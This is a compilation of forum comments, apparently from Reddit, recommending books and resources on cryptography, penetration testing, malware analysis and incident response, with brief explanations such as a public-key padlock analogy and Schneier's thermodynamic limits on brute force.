  I know there’s not a lot of certs here, and unfortunately, that’s how it is across the blue team. Certs here are usually very vendor-specific, and not applicable to defense as a whole. Those certifications exist, but I’m not listing them here.
  
  If people are interested, I can also do a similar write-up on Mobile Forensics and Cloud Forensics (which is my direct background).
  
  Lastly, here are some of my favorite news sources across the InfoSec community -
  
  News Sources
  
  
• Ars Technica
  
  
• InfoSecurity Magazine
  
  
• Security Weekly
  
  
• Iron Geek
  
  
• Krebs on Security
  
  
• reddit.com/r/netsec
  
  
• reddit.com/r/netsecstudents
  
  
• reddit.com/r/asknetsec
  
  
• reddit.com/r/computerforensics

Hi I'm not sure if these are the books you would enjoy, but I do have a couple of them in my pocket list:


Personally in recent years I'm interested in topics about algorithms/cryptology and economics, so The Code Book by Simon Singh, Fortune's Formula: The Untold Story of the Scientific Betting System That Beat the Casinos and Wall Street by William Poundstone, The Physics of Wall Street: A Brief History of Predicting the Unpredictable by James Owen Weatherall, these are the ones of my all time favorite "history" books about math and science and their applications. : )


I can still come up with another (popular) book, Freakonomics: A Rogue Economist Explores the Hidden Side of Everything, but I didn't really enjoy the book, guess I didn't agree some of the conclusions in that book. But maybe you would find it interesting. :)


Hope this helps! ☺️

I'm the manager of application security and research at a mid-level software vendor with over 400 developers and testers and I want to recommend you ignore all of the more generic advice currently in this thread. As someone with coding experience and interest, you have a unique path to infosec that so many companies want, but find it extremely difficult to hire for.

Any company that ships software has to consider the security of their application - full stop. Most rely on scanners or annual third-party vulnerability assessments for this, but obviously that falls short. They need people who can build security in from an architectural standpoint. Someone who can actually implement the fixes suggested by the above methods, and ideally, someone who can help implement security as an integral part of the SDLC instead of as a bolt-on premise.

My recommendation is to make your way through 24 Deadly Sins of Software Security and The Web Application Hacker's Handbook. If you can understand the bulk of concepts in these two books, you'll be leagues ahead of almost any developer you find yourself up against in a hiring scenario. For the coup de gras, learn about threat modeling. It's a great way to teach other developers and testers security and to build security into any system during design instead of post-release. Check out this book which is actually probably a little too comprehensive, use this card game from Microsoft (it seems silly, but I promise you it works), and watch this talk one of the guys on my team gave at BSides Cincinnati.

If you have any questions, PM me.

• Malware Analyst's CookBook is pretty good, lots of examples of techniques with example code.
  
• The Rootkit Arsenal is also supposedly really good.
  
• The Shellcoders Handbook (2nd edition) will help you get up to speed with mainstream exploitation techniques.
  
• Linux Kernel Development is a short read and describes the architecture of the Linux Kernel. Also explains many basic Operating System concepts.
  
• UNIX Network Programming, Volume 1: The Sockets Networking API (3rd Edition) introduced IP/IPv6/IPSec/TCP/UDP/SCTP as well as the POSIX Socket API.
  
• Cannot stress this enough, pickup your choice of a C/C++/Java/C#/Python/Ruby/etc book. Having a solid understanding of a programming language will make life much easier.

I agree with /u/Mxyzptlk_ about starting off with books and online material, as these will help you to get a feel for the topics you'll likely need to cover.

As a brief overview SANS provide a condensed handbook for IR - https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901 (PDF)

Although it's not everyone's cup of tea, and is certainly expensive, the SANS GIAC Certified Incident Handler certification is well worth pursuing in my opinion. I recently passed the exam after taking the training in July, and I've found lots of useful information during the process which has helped me out in my role.

Although this book may be for a bit further down the line, I would highly recommend the Blue Team Handbook: Incident Response Edition manual.

Hope this helps!

Some thoughts:

I've had people recommend the following books:

• Malware Analyst's Cookbook
  
  
• The Art of Memory Forensics
  
  
• For the next 23 hours or so, there's a Humble Bundle about hacking that might have some pertinent stuff (you already have PMA, but there's some other things that could be useful, and it's an amazing price)
  
  Other resources:
  
  
• Lenny Zeltser's site
  
  
• Dennis Yurichev's huge book on RE, available in a "lite" version as well as Russian
  
  
• He also has a challenge page if you want to try RE yourself

I am also fairly new to the subject. The first book I read on it was The Code Book by Simon Singh. I highly recommend it.

It was written in 1999, and is not an up-to-date, hands-on resource for encryption software. It is more of a primer on the history and evolution of codes and encryption, with great explanations of the foundations of the psychology and mathematics of codes. It's well written, a fun read, and very informative for beginning studies.

I hope it's ok in this sub to post a link to it. It's a non-affiliate Amazon link:

http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323

The movie is okay as a movie, but as as far as historical value goes, it's more in the 'inspired by' category. They touch upon a few of the moments and ideas presented here, however.

For a more (and way more interestingly brought) in depth explanation, I can recommend 'The Code Book' by Simon Singh (amazon)

http://www.amazon.com/Boy-Roald-Dahl-ebook/dp/B00F9F0TV6/ref=sr_1_1?s=digital-text&ie=UTF8&qid=1420691549&sr=1-1&keywords=roald+dahl+boy

http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography-ebook/dp/B004IK8PLE/ref=sr_1_1?s=digital-text&ie=UTF8&qid=1420691613&sr=1-1&keywords=the+code+book+simon+singh

"Boy" is probably "beneath" your son's level and "The Code Book" is may challenge your daughter but I think that those are books that they could both enjoy, so that'd be good bang-for-buck.

I'll also recommend "The Adventures of Sherlock Holmes," for your son, and, maybe, some classics, like "The Swiss Family Robinson" or Jules Verne but it's difficult, not knowing anything about them (not that you should be posting detailed descriptions of your kids).

Sure - we are working through this right now along with a lot of supplemental material the teacher has put together himself - the book is fine on its own though.
https://www.amazon.com/gp/product/1530506565/ref=oh_aui_detailpage_o01_s00?ie=UTF8&psc=1

While you could technically jump straight into this and start messing around with the pen testing applications, I'd strongly recommend working through the book from my original post as you'll have a strong foundation of what you are actually doing and what to do when things go wrong or aren't working exactly right.

We also use this book, however I'd probably not recommend spending the money unless you have worked through both books and really want to get into pen testing. Even then I probably wouldn't recommend it as its just a reference book or "cheat sheet" of popular commands, locations of files like passwords, etc. etc. Its made to be taken out to the field and as a small reference book if you forget something and don't have time for google. We are using it because we are actually doing pen testing in random labs where we walk into a room for the first time and have two hours to exploit various things. Ill link it anyway though just in case:
https://www.amazon.com/gp/product/1494295504/ref=oh_aui_detailpage_o01_s00?ie=UTF8&psc=1

There is another book we haven't bought but he may have us pick up and if that happens ill link it as well. Hope this all helped and good luck!


edit: I forgot about this - we will be using some of this once we've finished the second book in a few weeks:
https://www.amazon.com/dp/1787120236/ref=sspa_dk_detail_1?psc=1&pd_rd_i=1787120236&pd_rd_wg=ER8Ij&pd_rd_r=XXN8MBMYPHSMXCBYGQX8&pd_rd_w=lHcrS

That's cool. I used to play around with malware (analyzing it via a debugger, writing it) and learned quite a bit about security (I'm sure you know how many idiots there are out there armed with PHP and an introduction book.)


Some questions, then:

• What is your main OS?
  
• Do you do security consulting professionally? (e.g. pen testing)
  
• How "secure" would you say most people are? (Heh, banking on public wifi)
  
• Ever set any malicious program into the wild?
  
• What security books do you recommend? (I see Malware Analyst's Cookbook being recommended)

Great episode!

If anybody is interested in the history of cryptography and how it works, I suggest checking out "The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography" (Amazon link).

Although I haven't finished the book yet, I've found it very interesting so far. A good chunk of the book talks about cryptography in WWI and WWII, which I found pretty interesting. The Zimmerman telegram mentioned in this video is included in the book I believe.

I don't think either of these will help you become good at problem solving except on a very high conceptual level. Traditional games like those you mention are the inverse of programming. In traditional games you have a fixed measure of success, fixed legal moves, and a finite number of states. In programming you have a nebulous measure of success, an infinite number of things you can solve and an infinite number of states.

If you want to study games, look at them from a high level. What makes them the same? What makes them different? Are there strategies that transcend single games and apply to many?

You can also look for problems that are more open or look deeper into everyday things. Math proofs are a good example, think back to geometry and try to construct simple but sound proofs on your own. Try some problems on Project Euler. Read The Code Book and try to break some ciphers. Look at the objects you come across every day, ask yourself "why does this work the way it does?" and think through all the ramifications (here's one: why do stairwells have a swinging door on the first floor?) Look at the processes you have day to day, how could they be improved? How would you improve them?

You could find out for only 9$ now on Amazon. but I think pat131 is right though, it looks like an overhyped basic pentesting manual specially designed to extract money from script kiddies pockets. There are certainly better and more up to date resource available for free on the internet.

ps. "pen-tester" is the politically correct term for Hacker

The books mentioned in your other thread and by /u/dreddriver are good and I would like to add RTFM and Malware Analysis: Investigating and Analyzing Malicious Code. The latter is a little dated but still relevant as far as live memory analysis goes, which is the bees knees in modern forensics.

Make sure to ISOLATE and SANDBOX. Download Metasploitable and Ultimate Lamp.

This is a good guide--

https://community.rapid7.com/docs/DOC-2196

and this

http://resources.infosecinstitute.com/hacking-lab/

Keep up to date on CVE's

And as always, follow security guys on their blogs, Twitter, and whatever. People are super crafty and always coming up with new ideas.

If you want to pick up some Cryptography, The Code Book is a great intro.

Pragmatic Thinking and Learning is good for learning to learn.

The Pragmatic Programmer is good for project code planning and learning how to write code in a well thought out way.

Ethernet: The Definitive Guide is a good read if you want to get up to snuff on your networking, though it can be a bit dry at times.

It's really Comp Sci, but I really enjoyed The Code Book. Goes over secret codes over time, starting with the basics, ends with Cryptography, goes over some of Alen Turing's work. Over all a good, fascinating read.

I've only just become interested in cryptography, thanks to all the NSA "news" I guess. So far, I'm really enjoying the book: Everyday Cryptography by Keith M. Martin!.

It is a nice intro, full of references and further reading and even has exercises to help you really understand the subject. It is light on math, so not for serious crypto-freaks I guess.

I don't know if there exist threat modeling for a single person but usually most of the materials online are at enterprise level or something to that level. Like those of certification materials Security+ and CEH v9 or other similar courses. It can somewhat give you an idea how you want to determine your threat model.

For courses, I like Nathan House's stuff from Udemy.

There are as well books that cover those topics but the pages can range around 200 to over 600 of pages. E.g. The Basics of Cyber Safety has 254 pages and Threat Modeling: Designing for Security has 624 pages.

You can check those also:

https://en.wikipedia.org/wiki/Threat_model

https://en.wikipedia.org/wiki/Threat_%28computer%29#Threat_model

Otherwise see conferences like DEF CON, Black Hat, CCC and similar topics. Here's my give away:

• https://www.youtube.com/watch?v=JsVtHqICeKE
  
• https://www.youtube.com/watch?v=9XaYdCdwiWU
  
• https://www.youtube.com/watch?v=J1q4Ir2J8P8
  
  I hope that helps.

Off the top of my head:

The Psychopath Test is a wittily written personal study of detecting, treating and (possibly) rehabilitating psychopaths.

The Freakonomics books are written by both an economist and a journalist (so easy to read) and contain slightly left-of-centre economic theories with easy to follow research. These are excellent.

The Omnivores Dilemma is both engaging and though provoking. It's All about the production of food in the modern age. In particular, four different meals.

The Code Book is one of my all-time favourites. As the title suggests it's about all forms of cryptography. If you have a mathematical bent I also like Singh's book about Fermat's Enigma).

Given your background as a programmer, I would recommend starting with SQL exploits. You need to have at least a working knowledge in how programs and script work, and it gives you the framework for understand how to be clever with the existing code logic and how to think outside the box.

If that ends up being too easy or once you get a good handle on that, take a look at metasploit and the exploit database associated with that. Rather than just using the exploits, look at the code and get an idea of how the individual exploits work (which are all the same on the base level: using logic in a creative way the original programmers didn't think of or intend).

As for books, I recommend This One as a primer. It's not exactly up to date, but the theory is sound (giving you a solid foundation on how exploits are made and the thought process behind them).

I really like This One for learning metasploit and getting a further understanding of exploit scripts.

And I just love This Book in general. Once you take a look, you'll see why.

ah, yeah they're sorta the same thing.

Two other ideas, if he's into books, If Hemingway Wrote Javascript is an awesome one -- he pairs up like, 100 famous authors with programming languages and writes programs as if he were the author.

Also, The Code Book is really cool too. A really interesting and in depth history of encryption.

If you want background reading about the history try 'the code book' http://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323 I found it really interesting when I first read it, It is easy to read and got me interested in the subject.

a book like this one is good: http://www.schneier.com/book-applied.html for a general treatment.

Here are some resources I've found especially helpful for my own puzzle-making and codebreaking endeavors.

General Overviews and Websites for Getting Started:

• Cryptography - Wikipedia
  
  
• Cryptanalysis- Wikipedia
  
  
• Classical Cipher - Wikipedia
  
  
• Steganography - Wikipedia
  
  
• Transposition Cipher - Wikipedia
  
  
• Substitution Cipher - Wikipedia
  
  
• Polygraphic Substitution - Wikipedia
  
  
• Polyalphabetic Cipher - Wikipedia
  
  
• Ryan Riley's "Introduction to Basic Cryptography" series - Youtube: 1, 2, and 3 (plus several others, just look through his channel)
  
  
• The American Cryptogram Association
  
  
• Practical Cryptography
  
  
• The Black Chamber
  
  
• Braingle
  
  
• Elonka.com
  
  Basic Cryptanalytic Techniques:
  
  
• Frequency Analysis - Wikipedia
  
  
• Coincidence Counting - Wikipedia
  
  
• Kasiski Examination - Wikipedia
  
  Beginner Hand-cracking Tutorials:
  
  
• How to Solve a Cryptogram - Puzzlebaron.com
  
  
• Vigenère Decryption with Unknown Key - Youtube
  
  Tools for Creating and Cracking Codes Quickly:
  
  
• Rumkin Cipher Tools
  
  
• dCode Crypto Tools
  
  
• Quipqiup Crytogram Solver
  
  
• Cryptii Tools
  
  
• Guballa Vigenere Solver
  
  
• Boxentriq Code-Breaking Tools
  
  Interesting Cryptographic Puzzles/Methods for Inspiration:
  
  
• World's Greatest Unsolved Ciphers (Craig Bauer), Part 1 and Part 2
  
  
• Cicada 3301: LEMMiNO Documentary; Great Big Story Documentary Series
  
  
• Kryptos: Great Big Story Feature; Cracking Kryptos (Elonka Dunin)
  
  
• Enigma: Numberphile videos 1 and 2
  
  Books for Learning:
  
  
• Cryptanalysis: A Study of Ciphers and Their Solution, by Helen F. Gaines
  
  
• The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography, by Simon Singh
  
  
• The Codebreakers: The Comprehensive History of Secret Communication from Ancient Times to the Internet, by David Khan
  
  Books for Puzzle Solving:
  
  
• The Mammoth Book of Secret Code Puzzles, by Elonka Dunin
  
  
• Cracking Codes and Cryptograms for Dummies, by Denise Sutherland and Mark E. Koltko-Rivera
  
  Games:
  
  
• Cypher
  
  
• Puzzle Baron's Cryptograms
  
  EDIT: Fixed a link and made a couple minor touch-ups.

Some search terms for how the internet works: Packet switched networking, TCP, IP, SSL.

I don't think I have ever read a book about basic internet workings, the internet is really the best place to read about that stuff (hence the search terms).

Instead I will list some books which look at how we define security and why secure systems fail:

Secrets and Lies is a good primer discussing trust / networks / cryptography and a few other things at a high enough level to be interesting to a lay reader: http://www.amazon.com/Secrets-Lies-Digital-Security-Networked/dp/0471453803/ref=sr_1_4?ie=UTF8&qid=1419753343&sr=8-4

Art of Intrusion is packed full of stories about how systems (computers or otherwise) fail and become insecure: http://www.amazon.com/Art-Intrusion-Exploits-Intruders-Deceivers/dp/0471782661/ref=sr_1_1?ie=UTF8&qid=1419753466&sr=8-1 the sister book Art of Deception (stories about Social Engineering) is also pretty good.

The Code Book, mostly history, but provides a great introduction to cryptographic concepts. http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323/ref=pd_rhf_se_s_cp_7_RTJS?ie=UTF8&refRID=1RRWWY0RNX7G8HRYPFFS

Currently Practical Malware Analysis is the go to book. The first few chapters go over basic techniques and tools. The remaining of the book focuses on advanced techniques like disassembling and debugging samples.

Another good book is Malware Analyst's Cookbook. This gives some good recipes and tools to use.

I don't have much experiencing detecting samples that AV misses. I would first start out with a tool like MalwareBytes Anti-Malware. A lot of malware will try to "phone home", so you could monitor networking from the system. There are also common places on the system malware uses. I've seen samples use the temp, startup, and application data directories. You should also check the registry for any files to run at start. Hope this helps.

From Applied Cryptography 1996

>One of the consequences of the second law of thermodynamics is that a certain amount of energy is necessary to represent information. To record a single bit by changing the state of a system requires an amount of energy no less than kT, where T is the absolute temperature of the system and k is the Boltzman constant. (Stick with me; the physics lesson is almost over.)

>Given that k = 1.38×10-16 erg/°Kelvin, and that the ambient temperature of the universe is 3.2°Kelvin, an ideal computer running at 3.2°K would consume 4.4×10-16 ergs every time it set or cleared a bit. To run a computer any colder than the cosmic background radiation would require extra energy to run a heat pump.

>Now, the annual energy output of our sun is about 1.21×1041 ergs. This is enough to power about 2.7×1056 single bit changes on our ideal computer; enough state changes to put a 187-bit counter through all its values. If we built a Dyson sphere around the sun and captured all its energy for 32 years, without any loss, we could power a computer to count up to 2192. Of course, it wouldn't have the energy left over to perform any useful calculations with this counter.

>But that's just one star, and a measly one at that. A typical supernova releases something like 1051 ergs. (About a hundred times as much energy would be released in the form of neutrinos, but let them go for now.) If all of this energy could be channeled into a single orgy of computation, a 219-bit counter could be cycled through all of its states.

>These numbers have nothing to do with the technology of the devices; they are the maximums that thermodynamics will allow. And they strongly imply that brute-force attacks against 256-bit keys will be infeasible until computers are built from something other than matter and occupy something other than space.

There has been for many years.. by many I mean at least a decade and it has cost at minimum hundreds of billions of dollars.

China famously stole a lot of data about the worlds most expensive military projects in history from the US.. really good hackers and an entire military power to finance it does give results.

New York Times Best Seller - Cyber Warfare

The former 'IT Security' guy to the White House has a lot of really interesting material too, showing how massive of an issue it is for both the government and corporations.

Though strictly factual, Simon Singh's The Code Book can at best of times be read as a good spy novel, just based on real historical facts. A very interesting read nonetheless!

Sorry this has taken me so long to get too. Been busy.


First, understand that Kali is nothing mote than a collection of tools. Its those tools that you are actually wanting to learn.


KaliTutorials is one place you can start.


Also, there is an abundance of videos on YouTube and if you are serious about wanting to learn penetration testing/security makes sure you book mark Irongeek


Like I said earlier, by the time books are written, edited, and published, they can often be out of date.


If you do want to understand some of the basics, here are books you should look at:


Metasploit: The Penetration Tester's Guide


rtfm


btfm


Basic Security Testing with Kali Linux 2 I havent read this one but I have heard good things


The Hacker Playbook


[The Hacker Playbook 2] (https://www.amazon.com/Hacker-Playbook-Practical-Penetration-Testing/dp/1512214566/ref=pd_sim_14_4?_encoding=UTF8&pd_rd_i=1512214566&pd_rd_r=2HDYK8BDM5MR8PV03JG8&pd_rd_w=kiAl7&pd_rd_wg=fAjYi&psc=1&refRID=2HDYK8BDM5MR8PV03JG8)


Also a good list of resources can be found here: cybrary.it

Imagine someone wants to send you a package and they want to lock it with a padlock. They could put the lock on the box and send it to you and then somehow they have to get you the key. They could send it separately or through some other secret means, but there is always the possibility that the key could be intercepted and copied. This method is secure but only if you can securely transmit the key. This is basically symmetric encryption.

Now, what if instead you manufactured thousands of locks but only one key that opened them all. You sent those locks out in to the world to everyone that might want to send you a package. Anytime someone wanted to send you a package they simply grab one of your locks, lock the box, and send it to you. No one else can open the lock and the key is never sent anywhere, you can keep it safe at your house. This is asymmetric encryption and the basis for most everything we have on the internet nowadays. The locks you manufacture and send out into the world are you 'public key', and the key you keep is your 'private key'. Obviously the details get into some math and particularly how you can make and equivalent of this key/lock analogy but with very large prime numbers.

If you're at all interested in the topic, read this:

https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323

If that interests you, you should read The Code Book by Simon Singh. Great history of cryptography with a lot of well explained examples. He also wrote a great book about Fermat's Last Theorem.

Some pretty good reads on the subject:

Top Secret: A Handbook of Codes, Ciphers and Secret Writing https://www.amazon.com/dp/0763629723/ref=cm_sw_r_awd_WF1Dub0WN55RY

The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography https://www.amazon.com/gp/aw/d/B004IK8PLE/ref=aw_ss_kndl_dp/

Codebreaker: The History of Codes and Ciphers https://www.amazon.com/dp/0802715478/ref=cm_sw_r_awd_OH1Dub103RXB7

And, believe it or not,

Cracking Codes and Cryptograms For Dummies https://www.amazon.com/gp/aw/d/B005CB22A8/ref=aw_ss_kndl_dp/

You also might check your local newspaper for "Cryptoquote." It's a daily quote that uses a different cipher each day. Great for practice!

If you have to use Windows, and many of us do, do yourself a favor and learn some PowerShell. "ls" is a supported alias. In fact, a lot of Unix style commands are. It even uses the pipeline "|" only instead of piping text you are passing .Net objects.

> ps notepad | kill

You don't have to parse out the process id. It derives that from the object.

Do yourself a further favor and install Git. Then you can include all the tools under its usr/bin directory in your path and have such tools as grep, du, find, ssh, scp, etc. all complied for Windows.

The look on a Windows sysadmin's face when you ssh to a remote server from a pwsh command line makes it all worthwhile.

Edit: I mean, I even run vim with a custom vimrc file in a pwsh console on Windows 10 with my keyboard remapped to Dvorack. And GVim is my default tool for .txt files. I get a lot of weird looks from the Windows sysadmins.

Edit #2: If you want some really squirrely but very effective Win cmd style commands, check out the Red Team Field Manual. Some good shit in here for Linux too.

Yes.

Hacking Exposed

Shellcoders Handbook

Reverse Engineering

Malware Analyst's Cookbook

Gray Hat Python

Gray Hat Hacking Second Edition

Writing Security Tools & Exploits

Sockets, Shellcode, Porting and Coding: Reverese Engineering Exploits and Tool Coding for Security Professionals

Professional Penetration Testing

These are definitely some books you could start with. Once you've gone through those, you'll know more then a lot of them out there :)

There's these reddit threads on r/netsec:
http://www.reddit.com/r/netsec/comments/d3hua/how_to_get_started_in_netsec/
http://www.reddit.com/r/netsec/comments/ekyjw/interested_in_learning_about_network_security/

http://www.reddit.com/r/netsec/comments/es4si/what_are_some_good_netsec_books_out_there/
http://www.reddit.com/r/netsec/comments/g6r71/getting_started_in_network_security_a_list_of/

There's also loads of blogs and websites around, if you go hunting or look at some of these netsec threads, you'll find loads more material.

> This topic really needs a full book treatment to do well. Unfortunately like most security topics there just aren’t any great books to point to that I know of.

What about the Blue Team Field Manual?
If you are referring to security in general, I don't think there will ever be? Our field fluctuates way to much. The moment we get something on paper, its already outdated.

https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=sr_1_1?ie=UTF8&qid=1393996549&sr=8-1&keywords=red+team+field+manual

The red team field manual (rtfm) is a decent little cheat sheet booklet of unix shell commands, mostly geared towards hacking but useful for troubleshooting and learning networking.

I know I linked you the amazon one but theres free copies on github.

You mention a diverse set of topics, and you're probably not going to find any one book that covers all of them.

For algorithms for cryptography, signatures, protocols, etc. the definitive go to (last I checked) was still Schneier's Applied Cryptography.

For a history of cryptography, I'm fond of Kahn's The Codebreakers, but be forewarned that it is a large book.

For Network Security and Information Assurance concepts, I like Anderson's Security Engineering, but the state of the art changes so rapidly that it's difficult to recommend a book.

Starter for 10;
https://www.amazon.co.uk/Rtfm-Red-Team-Field-Manual/dp/1494295504
https://www.amazon.co.uk/Blue-Team-Handbook-condensed-Responder/dp/1500734756/ref=sr_1_1?s=books&ie=UTF8&qid=1485807594&sr=1-1&keywords=blue+team+incident+response

That should start the digging of the rabbit hole.

Edit: I should elaborate a bit, I've been purposefully obtuse. What makes a good Security Engineer? Curiosity, wanting to know how things work, understanding how things tick and really get under the hood of what makes those ones and zeros truly shine. If the above two doesn't get your curious and open your eyes to the MASSIVE amount of learning you need to do, as well as the potential rewards/pitfalls/overwhelming feelings, then move along. ;-)

You might want to check out this guy and his book aptly named the Code Book. I can't speak for it's authenticity and how accurate all the information is, being just an amateur, but it is quite interesting and gave me a nice overview of different secret message writing techniques. Worth a read.

Cracking the Coding Interview: More to help you get a job as a Software Engineering, but full of fun problems even if you do them just for the challenge and learning.

The Code Book: A great overview of the history of Cryptography.

What most consider the original is actually titled:

• Hackers by Steven Levy
  
  More recently, there have been several excellent titles. My suggestion is stick to non fiction as it will truly scare the yell out of you.
  
  
• Kingpin by Kevin Paulsen
  
  
• Hackers and Hacking by Margaret Haerens
  
  
• Cyber War by Richard C Clarke
  
  
• Schneier on Security by Bruce Schneier ---
  Almost everything by Bruce
  
  
• The Art of Intrusion by Kevin Mitnick. He has a couple of books as you may know. The advantage is he offers the perspective of a "former" hacker.
  
  I can recommend more but these are good starting points. Fiction is fun but for pure terror, grasping what these authors are revealing is the key.

If you want an interesting history of cyptography, read Simon Singh's The Code Book

You can write perfect encryption by hand using a One Time Pad. It requires exactly zero high level mathmatics. The reason it isn't used as often as other encryption methods is that it requires an exchange of keys each time it is used.

As soon as I looked at the image, the first thing that popped into my head was:

"Really useful chart to use against simple ciphers"

Have you read "The Code Book" [1]? Fantastic read :)

[1] https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323/

I found this book quite useful for explaining crypto and its practical applications in your everyday life.

I am a self-taught security guy so I was familiar with how things worked but this book really explained how they worked scientifically which I found awesome.

Edit:
Fixed link.

GIAC GSE here and I had successfully pass 4-5 GIAC certification via self-study. I can relate your situation completely since I am exactly in the same situation as you 8 years ago.

​

Google up the course authors and buy their Amazon books. Countermeasure Art Active Defense is by John Strand and a course author/instructor for GCIH. The content may be different by underlying concepts is always the same. Buy those books that are written by people who had an affiliation with SANS in a way or another.

​

If books by SANS affiliated authors are not available, then get those books with high reviews that are related to the topic you are studying for.

​

https://www.amazon.com/Offensive-Countermeasures-Art-Active-Defense-ebook/dp/B00DQSQ7QY

https://www.amazon.com/gp/product/B01M3USWQ2/ref=dbs_a_def_rwt_bibl_vppi_i2

https://www.amazon.com/Cybersecurity-Incident-Response-Eradicate-Incidents/dp/1484238699

​

Once you are done with the books, indexed them and buy a practice test to test the book's contents against the exam. Google up any information that the books don't cover and print them out. If you can pass the practice test with those books, then you will do well to pass the exams with those books + google printouts on the actual exams.

I highly recommend "The Code Book" to any novices interested in this sort of thing, it's readable and entertaining without being insulting or excessively complex.

No problem. I am a crypto nut. I love talking about this stuff! If you'd like to learn more about cryptography, then you should add this book to your wishlist and pray someone gets it for you! It follows the history of cryptography from its infancy to its present state of being and goes on to speculate about the nature of cryptography in the future. It's one of my all time favorite books!

Here are a few books I recommend:

Blue Team Handbook


Defensive Security Handbook


The Practice of Network Security Monitoring


Crafting the Infosec Playbook


And don't forget the NIST Cyber Security Framework

If you like books and are interested in modern cryptography, "Serious Cryptography" was excellent. A more introductory text with historical context is "The Code Book".

I picked up The Code Book from a used bookstore and let it sit on my shelf for about a year. It's a light history of cryptography from ancient times until modern, but for some reason I was afraid it would be too dense and math-heavy for me to understand. On the contrary, it's a very accessible introduction to the development of cryptography and entertaining examples from history, which sparked an interest in crypto that i've been planning to explore further.

Though not really geared to compsci, The Code Book is a great history of cryptography and cryptanalysis from the dawn of time to current. Excellent read.

This book is a pretty good beginning on the topic.

http://www.amazon.com/The-Code-Book-Science-Cryptography/dp/0385495323

You can also find it online in pdf.

A quantum computer is able to but the bits of data that make up computer information into a superposition where the 0s and 1s at the same time and rapidly go bit by bit checking the combinations.

A quantum computer could break an RSA, SHA, etc encryption scheme but a quantum computer could also be able to create a cryptography scheme that uses the quantum computer and thus you'd wind up with a quantum computer trying to break quantum encryption.

This is a high level overview and if someone has extra time please add to it.

Since this is the subreddit for DFIR, that's what you're going to end up with as far as suggestions go. For pentesting stuff, checkout:

-Web Application Hacker's Handbook: https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 (this has some labs, but just reading through the various weaknesses in WebApps will be a great start)

-The Hacker Playbook: https://www.amazon.com/dp/1512214566/ref=pd_lpo_sbs_dp_ss_1?pf_rd_p=1944687742&pf_rd_s=lpo-top-stripe-1&pf_rd_t=201&pf_rd_i=1118026470&pf_rd_m=ATVPDKIKX0DER&pf_rd_r=1NSA1RZZ3WQTP374S9WK

Red Team Field Manual: https://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/ref=pd_bxgy_14_img_2?ie=UTF8&psc=1&refRID=S7FG8F9TCMZMM9HVX2TN

Those two are good general pentesting books. You might also try /r/AskNetsec for other suggestions.

For an excellent, easily accessible description of some of these codes and the work done to break them, I recommend The Code Book by Simon Singh. Amazon link

The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography is excellent if you’re interested in this stuff. It takes you through the history of encryption and explains everything well.

I post this because this is the money system of a libertarian society, and we might have to think about some solutions to the problems he's outlining here. Also, this isn't just some ignorant NY Times reporter, this is the guy that wrote the book on cryptography. Applied Cryptography was, and still is, one of the first books people recommend on cryptographic protocols, so it seems like a good idea to consider what he has to say on the subject.

Agree with others that there are privacy issues with Apple. But I think for most people its going to be the easiest least bad option for their privacy.

I recommend this book for maintaining privacy on ios: Just really covers everything.

I'd be wary of someone's suggestion to install one killer app. In fact in general the less apps on your phone the better.

My mom got me this book. To follow the book, I had to learn assembly. I rekt the family computer a good number of times... These days I'm a systems programmer - and quite happy.

I have RTFM in my bag, but more for the joke than anything. In reality, it has a lot of good stuff in it, across the board.
http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504

I usually bookmark a bunch of stuff, but end up re-googling anyway because it's faster than traversing my bookmarks.

I quite enjoyed The Code Book by Simon Singh. It's a book on cryptography for the layman. Not really about computer science, per se, but it's fascinating and explains a lot about thinking algorithmically.

Simon Singh's book is fantastic. It was one of my early reads in the field of crypto. I read it when I was in middle school so I don't think it would be too techy for you! But it covers a ton of topics, including topics that will be relevant into the future. So in short: yes, buy it.

EDIT: It occurred to me that I read one of Simon's earlier works, I think it's part of the same series? Anyway, my recommendation is: https://www.amazon.com/Code-Book-Science-Secrecy-Cryptography/dp/0385495323

If you're at all interested in encryption, The Code Book is a great place to start.

I really recommend The Code Book by Simon Singh. Not only is it an amazing history of ciphers and codebreaking, but he gives a LOT of examples and practice material. There's some more challenges on his web site as well.

If you're looking for a book that teaches you about codes and practical codebreaking, here are two greats: Cryptanalysis: A Study of Ciphers and Their Solution, by Helen Fouché Gaines and Codes, Ciphers and Secret Writing, by Martin Gardner.

For a historical look try The Code Book: The Science of Secrecy from Ancient Egypt to Quantum Cryptography, by Simon Singh. I really loved that one!

Yeah just don't buy it unless you really want to do and explore a lot of C programming. That said it was great for my systems programming class as a sort of reference. But as for attack/defense start looking into networking if you aren't familiar with it, and if you are network security then, of course, there is actual information security, what most people mean by crypto even though there is a lot more to it. For crypto, I'd recommend This but that's more an overview of what your crypto algorithms actually do.

If you want to understand the state of privacy, I highly recommend reading this book:

https://www.amazon.com/dp/B004IK8PLE?ref_=cm_sw_r_kb_dp_j4QBCb50GGMEN&tag=kpembed-20&linkCode=kpe

This is not a fight that we win or lose. This is a never ending war with skirmishes and stalemates. You are in charge of your own privacy with what you say or do.

I found this book to be excellent:

https://www.amazon.com/Everyday-Cryptography-Fundamental-Principles-Applications/dp/0199695598/

I have a strong programming background but not such a strong maths background. I found the book to be technical (explaining the different ciphers, different modes, etc) without dwelling on the maths. The first section seemed a little slow but I was glad that I read it because it was all relevent later on

Bingo. It's silly to get all up in arms about privacy when you can't even lock your own doors. Right now we're trying to enforce that we can, reliably, lock our door.

I suspect fingerprints (and perhaps in the future retinal) scans will make this better. You can create some nice entropy from a fingerprint, since they are very unique. You can also use that as half of your key with a password as dual authentication making you really freaking secure. BUT with a backdoor -- none of that matters, as they have access to decrypt it, or worse, install malicious software. Imagine the bot net you could create with iPhones alone.

